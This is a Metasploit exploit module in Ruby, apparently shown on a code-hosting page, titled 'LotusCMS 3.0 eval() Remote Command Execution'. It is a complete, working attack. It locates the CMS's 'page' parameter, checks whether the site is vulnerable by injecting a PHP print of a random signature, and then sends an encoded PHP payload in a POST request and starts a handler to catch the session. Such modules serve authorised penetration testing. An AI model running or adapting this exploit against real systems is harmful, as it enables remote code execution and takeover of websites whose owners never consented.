FilesExpand file tree

 master

/

18565.rb

Copy path

Blame

More file actions

Blame

More file actions

Latest commit

 

History

History

History

executable file

·

147 lines (130 loc) · 4.18 KB

 master

/

18565.rb

Copy path

Top

File metadata and controls

• Code
• Blame

executable file

·

147 lines (130 loc) · 4.18 KB

Raw

Copy raw file

Download raw file

Open symbols panel

Edit and raw actions

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

include Msf::Auxiliary::WmapScanUniqueQuery

def initialize(info = {})

super(update_info(info,

'Name' => 'LotusCMS 3.0 eval() Remote Command Execution',

'Description' => %q{

This module exploits a vulnerability found in Lotus CMS 3.0's Router()

function. This is done by embedding PHP code in the 'page' parameter,

which will be passed to a eval call, therefore allowing remote code execution.

The module can either automatically pick up a 'page' parameter from the

default page, or manually specify one in the URI option. To use the automatic

method, please supply the URI with just a directory path, for example: "/lcms/".

To manually configure one, you may do: "/lcms/somepath/index.php?page=index"

},

'License' => MSF_LICENSE,

'Author' =>

[

'Alligator Security Team',

'dflah_ <dflah_[at]alligatorteam.org>',

'sherl0ck_ <sherl0ck_[at]alligatorteam.org>',

'sinn3r' #Metasploit-fu

],

'References' =>

[

[ 'OSVDB', '75095' ],

[ 'URL', 'http://secunia.com/secunia_research/2011-21/' ]

],

'Payload' =>

{

'Space' => 4000, # only to prevent error HTTP 414 (Request-URI Too Long)

'DisableNops' => true,

'BadChars' => "#",

'Keys' => ['php']

},

'Platform' => [ 'php' ],

'Arch' => ARCH_PHP,

'Targets' => [[ 'Automatic LotusCMS 3.0', { }]],

'Privileged' => false,

'DisclosureDate' => 'Mar 3 2011',

'DefaultTarget' => 0))

register_options(

[

OptString.new('URI', [true, 'URI', '/lcms/']),

Opt::RPORT(80),

], self.class)

end

def target_url

uri = datastore['URI']

# Make sure uri begins with '/'

if uri[0] != '/'

uri = '/' + uri

end

# Extract two things:

# 1. The file path (/index.php), including the base

# 2. GET parameters from the GET query

uri = uri.scan(/^(\/.+)\/(\w+\.php)*\?*(\w+=.+&*)*$/).flatten

base = (uri[0] || "") + '/'

fname = uri[1] || ""

query = uri[2] || ""

params = queryparse(query) rescue ""

# Use the user-supplied query if there's one, if not we'll auto-detect

# by regexing a hyper-link

if base.empty? or fname.empty? or params.empty?

res = send_request_cgi({

'method' => 'GET',

'uri' => datastore['URI']

}, 20)

if res and res.code == 200

uri = res.body.scan(/<a.*href=['|"](\/*index\.php)\?.*(page=\w+)['|"].*>/).flatten

@uri = base + uri[0]

@arg = uri[1]

print_status("Using found page param: #{@uri}?#{@arg}")

else

@uri = ""

@arg = ""

end

else

@uri = base + fname

@arg = "page=#{params['page']}"

end

end

def check

target_url

if @uri.empty? or @arg.empty?

print_error("Unable to get the page parameter, please reconfigure URI")

return

end

signature = rand_text_alpha(rand(10)+10)

stub = "${print('#{signature}')};"

sploit = "');#{stub}#"

response = send_request_cgi(

{

'method' => 'POST',

'uri' => @uri,

'data' => @arg + Rex::Text.uri_encode(sploit)

}, 20)

if response and response.body =~ /#{signature}/

print_status("Signature: #{signature}")

return Exploit::CheckCode::Vulnerable

else

print_error("Signature was not detected")

return Exploit::CheckCode::Safe

end

end

def exploit

return if not check == Exploit::CheckCode::Vulnerable

begin

sploit = "');#{payload.encoded}#"

print_status("Sending exploit ...")

res = send_request_cgi(

{

'method' => 'POST',

'uri' => @uri,

'data' => @arg + Rex::Text.uri_encode(sploit)

}, 20)

handler

rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout

rescue ::Timeout::Error, ::Errno::EPIPE

end

end

end